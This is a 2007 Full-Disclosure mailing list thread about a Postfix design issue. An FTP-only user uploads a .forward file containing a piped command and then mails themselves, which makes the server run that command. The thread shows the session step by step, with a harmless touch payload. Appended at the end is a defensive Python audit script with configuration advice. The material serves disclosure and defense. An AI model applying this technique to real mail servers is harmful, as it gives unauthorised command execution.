Message-ID: <a3663b3d0712141152g6bc84222ld0dccbc9d42a449a@mail.gmail.com>
Date: Fri, 14 Dec 2007 13:52:33 -0600
From: "Adam N" <interfect@...il.com>
To: "Fredrick Diggle" <fdiggle@...il.com>
Cc: kcope <kingcope@....net>, full-disclosure@...ts.grok.org.uk
Subject: Re: Small Design Bug in Postfix - REMOTE
No, the idea is that you are a user with no login access, only FTP.
By doing this, you get shell access (with sane privileges, thankfully) when
you're supposed to only have FTP.
On Dec 13, 2007 2:34 PM, Fredrick Diggle <fdiggle@...il.com> wrote:
> You have write perms on a user's home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <kingcope@....net> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specify an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > From the manpage ALIASES(5)
> > "aliases - Postfix local alias database format"
> >
> > |command
> > Mail is piped into command. Commands that contain
> > special characters, such as whitespace, should be
> > enclosed between double quotes. See local(8) for
> > details of delivery to command.
> >
> > When the command fails, a limited amount of command
> > output is mailed back to the sender. The file
> > /usr/include/sysexits.h defines the expected exit
> > status codes. For example, use "|exit 67" to simulate
> > a "user unknown" error, and "|exit 0" to
> > implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The problem with executing commands via .forward files is that
> > if someone manages to place a file into one's home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > >telnet box 21
> > >USER rootkey
> > >PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > >put .forward
> >
> > Now send an email to user rootkey.
> >
> > >telnet box 25
> > >mail from: rootkey
> > >rcpt to: rootkey
> > >data
> > >.
> >
> > RESULT:
> >
> > kcope@box:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
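A defender-side check for the condition discussed in this thread, as an added example that is not part of the original posts: it lists accounts with no login shell whose .forward contains a command, file or :include: destination. The shell list, the sample accounts and all function names are assumptions made for illustration.

```python
from pathlib import Path

# Assumption: these shells mark an account as "no interactive login" (e.g. FTP-only).
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}
KINDS = (("|", "command"), ("/", "file"), (":include:", "include"))  # prefixes per aliases(5)

# Constructed sample data: passwd entries and .forward contents keyed by home directory.
SAMPLE_PASSWD = """ftponly:x:1001:1001::/home/ftponly:/usr/sbin/nologin
alice:x:1002:1002::/home/alice:/bin/bash
mirror:x:1003:1003::/home/mirror:/bin/false"""
SAMPLE_FORWARDS = {
    "/home/ftponly": '"|touch /tmp/XXX", ftponly@example.org\n',
    "/home/alice": "|procmail\n",
    "/home/mirror": "ops@example.org\n",
}

def split_destinations(line):
    """Split one .forward line on commas outside double quotes; the quotes are dropped."""
    parts, quoted = [""], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            parts.append("")
        else:
            parts[-1] += ch
    return [p.strip() for p in parts if p.strip()]

def read_forward(home):
    """Return the text of <home>/.forward, or "" when it is missing or unreadable."""
    try:
        return Path(home, ".forward").read_text(errors="replace")
    except OSError:
        return ""

def audit(passwd_text, reader=read_forward):
    """List (user, kind, destination) for no-login accounts with a non-address destination."""
    findings = []
    for entry in passwd_text.splitlines():
        fields = entry.split(":")
        if len(fields) == 7 and fields[6] in NOLOGIN_SHELLS:
            for line in (reader(fields[5]) or "").splitlines():
                for dest in split_destinations(line):
                    kind = next((k for p, k in KINDS if dest.startswith(p)), None)
                    if kind:
                        findings.append((fields[0], kind, dest))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_PASSWD, SAMPLE_FORWARDS.get))
```

On a live host, call `audit(Path("/etc/passwd").read_text())` so the default reader opens each home directory's .forward. Where mail-triggered commands from .forward are not needed, Postfix's `allow_mail_to_commands` parameter in main.cf can be set to `alias` so that `|command` destinations in .forward files are refused.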